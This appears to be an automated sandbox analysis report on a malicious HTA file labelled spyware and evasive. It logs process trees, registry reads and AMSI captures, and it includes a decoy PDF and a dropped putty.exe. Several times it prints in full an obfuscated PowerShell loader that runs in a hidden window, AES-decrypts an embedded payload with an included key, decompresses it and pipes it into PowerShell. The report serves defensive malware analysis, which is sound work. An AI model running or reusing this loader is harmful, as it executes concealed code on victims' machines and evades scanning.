Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe $fNaPOP = 'AAAAAAAAAAAAAAAAAAAAAPq3+YYuESDCP30fCtt1g8+BllQDeEK2RL0/q2v+83d4BFFpsS5iJU6kFeS1JzaAIIjoFB3qbZ4arUa/P0A2xkjM5iuNW72eqrksKCnteMTJHARvOlHxtFF2Y5wz5P2jTj8qOAbDNBfSmoktklgidKmITv4Lcg8mILUKzUd9s+wKjzqzjTCjO/2G5KR/8OACyCs/NGTKY8euJIFd3JJz5ylYW3oFjpf3MJ9CzN20cb8PHYfovW8CHT0xnVzCfmgO/E8zd5ZqzfWG7smpcDA2ExuZDGAJGu5tHHWB7zEHt3D3piB67d6q7vHJNkGbSIV6zCPOFIP7s25z6l2WgczC+2l0H4WG5atfmshceYxBLkJmL3+4vdT9rw3zEp3Gp2C/Hy8udbeID77xXgK3+QrDNhAlxW7kxAFq6B8jYiFfP3403hxtqvgrEaHvVf8Yj2RvMsbDjplrnScmvGd9IqA7OxvubNuWW9u2M23JiSeSQ4uZ7NhkFBozi8YuXfaIrOonGW7TY7XUD6uPRXjTiAwNNNS2sAQk/oKX7moMS6bGVr3YYH/SG2sq5Kq7RYEJPk4BTIkllKdMILZqNu8d/Xf1CeZAopnM27zbagY2uYzvLziepNimUT6TKFecr+KQcrmydbFCsk/3RbYPdZNEoDmRrJZuEJPSkcyj60Ix9eVqYbKTMtPkyyT4yGrR/6uU6i+3tYlLQXZjJHNnGBzyXVXwMnYs9nzNdpphf2bMYeLnENNqsNg8rs0j4jTd9OzOJo6orWXFY54hD1OMI8Rzby565/grQubRf9KNj3pkkKx5LO7JjjkdA49ARW/YGaIvigRgvZKfqOLkwINuh3agYb/7frzuyKeLCzmwXHR7gPJmxmpop3ScsHlT6P522CVJacLhmbxH8EbVj89KLiG5DnG0o1y0kV3zJ8QKXZcmfiHT+wA0P7c89p9Ihf41CM6quS0cjzqXJH76OPrm8iujlCD9SmMxUkrE8SoPlRjE+s8rbdTv';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell - Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Research.pdfJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\putty.exe "C:\Users\user\putty.exe" Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2128 --field-trial-handle=1564,i,7959819648417443592,3997577616809760479,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Research.pdfJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yzagccmo.ije.ps1Jump to behavior
Source: classification engineClassification label: mal92.spyw.evad.winHTA@27/30@1/2
Source: C:\Users\user\putty.exeCode function: 10_2_00446368 CoCreateInstance,10_2_00446368
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\putty.exeCode function: 10_2_00446525 GetLastError,FormatMessageA,GetLastError,_strlen,_strlen,10_2_00446525
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6088:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5928:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR | powershell - }@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations a
Source: putty.exeString found in binary or memory: ssh.tunnels.portfwd.ipversion:config-ssh-portfwd-address-family
Source: putty.exeString found in binary or memory: connection.ipversion:config-address-family
Source: putty.exeString found in binary or memory: serial.stopbits:config-serial-stopbits
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\putty.exeWindow detected: Number of UI elements: 20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.htaStatic file information: File size 1153504 > 1048576

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $fNaPOP = 'AAAAAAAAAAAAAAAAAAAAAPq3+YYuESDCP30fCtt1g8+BllQDeEK2RL0/q2v+83d4BFFpsS5iJU6kFeS1JzaAIIjoFB3qbZ4arUa/P0A2xkjM5iuNW72eqrksKCnteMTJHARvOlHxtFF2Y5wz5P2jTj8qOAbDNBfSmoktklgidKmITv4Lcg8mILUKzUd9s+wKjzqzjTCjO/2G5KR/8OACyCs/NGTKY8euJIFd3JJz5ylYW3oFjpf3MJ9CzN20cb8PHYfovW8CHT0xnVzCfmgO/E8zd5ZqzfWG7smpcDA2ExuZDGAJGu5tHHWB7zEHt3D3piB67d6q7vHJNkGbSIV6zCPOFIP7s25z6l2WgczC+2l0H4WG5atfmshceYxBLkJmL3+4vdT9rw3zEp3Gp2C/Hy8udbeID77xXgK3+QrDNhAlxW7kxAFq6B8jYiFfP3403hxtqvgrEaHvVf8Yj2RvMsbDjplrnScmvGd9IqA7OxvubNuWW9u2M23JiSeSQ4uZ7NhkFBozi8YuXfaIrOonGW7TY7XUD6uPRXjTiAwNNNS2sAQk/oKX7moMS6bGVr3YYH/SG2sq5Kq7RYEJPk4BTIkllKdMILZqNu8d/Xf1CeZAopnM27zbagY2uYzvLziepNimUT6TKFecr+KQcrmydbFCsk/3RbYPdZNEoDmRrJZuEJPSkcyj60Ix9eVqYbKTMtPkyyT4yGrR/6uU6i+3tYlLQXZjJHNnGBzyXVXwMnYs9nzNdpphf2bMYeLnENNqsNg8rs0j4jTd9OzOJo6orWXFY54hD1OMI8Rzby565/grQubRf9KNj3pkkKx5LO7JjjkdA49ARW/YGaIvigRgvZKfqOLkwINuh3agYb/7frzuyKeLCzmwXHR7gPJmxmpop3ScsHlT6P522CVJacLhmbxH8EbVj89KLiG5DnG0o1y0kV3zJ8QKXZcmfiHT+wA0P7c89p9Ihf41CM6quS0cjzqXJH76OPrm8iujlCD9SmMxUkrE8SoPlRjE+s8rbdTv';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR | powershell - }
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe $fNaPOP = 'AAAAAAAAAAAAAAAAAAAAAPq3+YYuESDCP30fCtt1g8+BllQDeEK2RL0/q2v+83d4BFFpsS5iJU6kFeS1JzaAIIjoFB3qbZ4arUa/P0A2xkjM5iuNW72eqrksKCnteMTJHARvOlHxtFF2Y5wz5P2jTj8qOAbDNBfSmoktklgidKmITv4Lcg8mILUKzUd9s+wKjzqzjTCjO/2G5KR/8OACyCs/NGTKY8euJIFd3JJz5ylYW3oFjpf3MJ9CzN20cb8PHYfovW8CHT0xnVzCfmgO/E8zd5ZqzfWG7smpcDA2ExuZDGAJGu5tHHWB7zEHt3D3piB67d6q7vHJNkGbSIV6zCPOFIP7s25z6l2WgczC+2l0H4WG5atfmshceYxBLkJmL3+4vdT9rw3zEp3Gp2C/Hy8udbeID77xXgK3+QrDNhAlxW7kxAFq6B8jYiFfP3403hxtqvgrEaHvVf8Yj2RvMsbDjplrnScmvGd9IqA7OxvubNuWW9u2M23JiSeSQ4uZ7NhkFBozi8YuXfaIrOonGW7TY7XUD6uPRXjTiAwNNNS2sAQk/oKX7moMS6bGVr3YYH/SG2sq5Kq7RYEJPk4BTIkllKdMILZqNu8d/Xf1CeZAopnM27zbagY2uYzvLziepNimUT6TKFecr+KQcrmydbFCsk/3RbYPdZNEoDmRrJZuEJPSkcyj60Ix9eVqYbKTMtPkyyT4yGrR/6uU6i+3tYlLQXZjJHNnGBzyXVXwMnYs9nzNdpphf2bMYeLnENNqsNg8rs0j4jTd9OzOJo6orWXFY54hD1OMI8Rzby565/grQubRf9KNj3pkkKx5LO7JjjkdA49ARW/YGaIvigRgvZKfqOLkwINuh3agYb/7frzuyKeLCzmwXHR7gPJmxmpop3ScsHlT6P522CVJacLhmbxH8EbVj89KLiG5DnG0o1y0kV3zJ8QKXZcmfiHT+wA0P7c89p9Ihf41CM6quS0cjzqXJH76OPrm8iujlCD9SmMxUkrE8SoPlRjE+s8rbdTv';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $fNaPOP = 'AAAAAAAAAAAAAAAAAAAAAPq3+YYuESDCP30fCtt1g8+BllQDeEK2RL0/q2v+83d4BFFpsS5iJU6kFeS1JzaAIIjoFB3qbZ4arUa/P0A2xkjM5iuNW72eqrksKCnteMTJHARvOlHxtFF2Y5wz5P2jTj8qOAbDNBfSmoktklgidKmITv4Lcg8mILUKzUd9s+wKjzqzjTCjO/2G5KR/8OACyCs/NGTKY8euJIFd3JJz5ylYW3oFjpf3MJ9CzN20cb8PHYfovW8CHT0xnVzCfmgO/E8zd5ZqzfWG7smpcDA2ExuZDGAJGu5tHHWB7zEHt3D3piB67d6q7vHJNkGbSIV6zCPOFIP7s25z6l2WgczC+2l0H4WG5atfmshceYxBLkJmL3+4vdT9rw3zEp3Gp2C/Hy8udbeID77xXgK3+QrDNhAlxW7kxAFq6B8jYiFfP3403hxtqvgrEaHvVf8Yj2RvMsbDjplrnScmvGd9IqA7OxvubNuWW9u2M23JiSeSQ4uZ7NhkFBozi8YuXfaIrOonGW7TY7XUD6uPRXjTiAwNNNS2sAQk/oKX7moMS6bGVr3YYH/SG2sq5Kq7RYEJPk4BTIkllKdMILZqNu8d/Xf1CeZAopnM27zbagY2uYzvLziepNimUT6TKFecr+KQcrmydbFCsk/3RbYPdZNEoDmRrJZuEJPSkcyj60Ix9eVqYbKTMtPkyyT4yGrR/6uU6i+3tYlLQXZjJHNnGBzyXVXwMnYs9nzNdpphf2bMYeLnENNqsNg8rs0j4jTd9OzOJo6orWXFY54hD1OMI8Rzby565/grQubRf9KNj3pkkKx5LO7JjjkdA49ARW/YGaIvigRgvZKfqOLkwINuh3agYb/7frzuyKeLCzmwXHR7gPJmxmpop3ScsHlT6P522CVJacLhmbxH8EbVj89KLiG5DnG0o1y0kV3zJ8QKXZcmfiHT+wA0P7c89p9Ihf41CM6quS0cjzqXJH76OPrm8iujlCD9SmMxUkrE8SoPlRjE+s8rbdTv';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR | powershell - }Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe $fNaPOP = 'AAAAAAAAAAAAAAAAAAAAAPq3+YYuESDCP30fCtt1g8+BllQDeEK2RL0/q2v+83d4BFFpsS5iJU6kFeS1JzaAIIjoFB3qbZ4arUa/P0A2xkjM5iuNW72eqrksKCnteMTJHARvOlHxtFF2Y5wz5P2jTj8qOAbDNBfSmoktklgidKmITv4Lcg8mILUKzUd9s+wKjzqzjTCjO/2G5KR/8OACyCs/NGTKY8euJIFd3JJz5ylYW3oFjpf3MJ9CzN20cb8PHYfovW8CHT0xnVzCfmgO/E8zd5ZqzfWG7smpcDA2ExuZDGAJGu5tHHWB7zEHt3D3piB67d6q7vHJNkGbSIV6zCPOFIP7s25z6l2WgczC+2l0H4WG5atfmshceYxBLkJmL3+4vdT9rw3zEp3Gp2C/Hy8udbeID77xXgK3+QrDNhAlxW7kxAFq6B8jYiFfP3403hxtqvgrEaHvVf8Yj2RvMsbDjplrnScmvGd9IqA7OxvubNuWW9u2M23JiSeSQ4uZ7NhkFBozi8YuXfaIrOonGW7TY7XUD6uPRXjTiAwNNNS2sAQk/oKX7moMS6bGVr3YYH/SG2sq5Kq7RYEJPk4BTIkllKdMILZqNu8d/Xf1CeZAopnM27zbagY2uYzvLziepNimUT6TKFecr+KQcrmydbFCsk/3RbYPdZNEoDmRrJZuEJPSkcyj60Ix9eVqYbKTMtPkyyT4yGrR/6uU6i+3tYlLQXZjJHNnGBzyXVXwMnYs9nzNdpphf2bMYeLnENNqsNg8rs0j4jTd9OzOJo6orWXFY54hD1OMI8Rzby565/grQubRf9KNj3pkkKx5LO7JjjkdA49ARW/YGaIvigRgvZKfqOLkwINuh3agYb/7frzuyKeLCzmwXHR7gPJmxmpop3ScsHlT6P522CVJacLhmbxH8EbVj89KLiG5DnG0o1y0kV3zJ8QKXZcmfiHT+wA0P7c89p9Ihf41CM6quS0cjzqXJH76OPrm8iujlCD9SmMxUkrE8SoPlRjE+s8rbdTv';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR Jump to behavior
Suspicious command line found
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: "C:\Windows\system32\cmd.exe" /c powershell.exe $fNaPOP = 'AAAAAAAAAAAAAAAAAAAAAPq3+YYuESDCP30fCtt1g8+BllQDeEK2RL0/q2v+83d4BFFpsS5iJU6kFeS1JzaAIIjoFB3qbZ4arUa/P0A2xkjM5iuNW72eqrksKCnteMTJHARvOlHxtFF2Y5wz5P2jTj8qOAbDNBfSmoktklgidKmITv4Lcg8mILUKzUd9s+wKjzqzjTCjO/2G5KR/8OACyCs/NGTKY8euJIFd3JJz5ylYW3oFjpf3MJ9CzN20cb8PHYfovW8CHT0xnVzCfmgO/E8zd5ZqzfWG7smpcDA2ExuZDGAJGu5tHHWB7zEHt3D3piB67d6q7vHJNkGbSIV6zCPOFIP7s25z6l2WgczC+2l0H4WG5atfmshceYxBLkJmL3+4vdT9rw3zEp3Gp2C/Hy8udbeID77xXgK3+QrDNhAlxW7kxAFq6B8jYiFfP3403hxtqvgrEaHvVf8Yj2RvMsbDjplrnScmvGd9IqA7OxvubNuWW9u2M23JiSeSQ4uZ7NhkFBozi8YuXfaIrOonGW7TY7XUD6uPRXjTiAwNNNS2sAQk/oKX7moMS6bGVr3YYH/SG2sq5Kq7RYEJPk4BTIkllKdMILZqNu8d/Xf1CeZAopnM27zbagY2uYzvLziepNimUT6TKFecr+KQcrmydbFCsk/3RbYPdZNEoDmRrJZuEJPSkcyj60Ix9eVqYbKTMtPkyyT4yGrR/6uU6i+3tYlLQXZjJHNnGBzyXVXwMnYs9nzNdpphf2bMYeLnENNqsNg8rs0j4jTd9OzOJo6orWXFY54hD1OMI8Rzby565/grQubRf9KNj3pkkKx5LO7JjjkdA49ARW/YGaIvigRgvZKfqOLkwINuh3agYb/7frzuyKeLCzmwXHR7gPJmxmpop3ScsHlT6P522CVJacLhmbxH8EbVj89KLiG5DnG0o1y0kV3zJ8QKXZcmfiHT+wA0P7c89p9Ihf41CM6quS0cjzqXJH76OPrm8iujlCD9SmMxUkrE8SoPlRjE+s8rbdTv';$mehLaZDc = 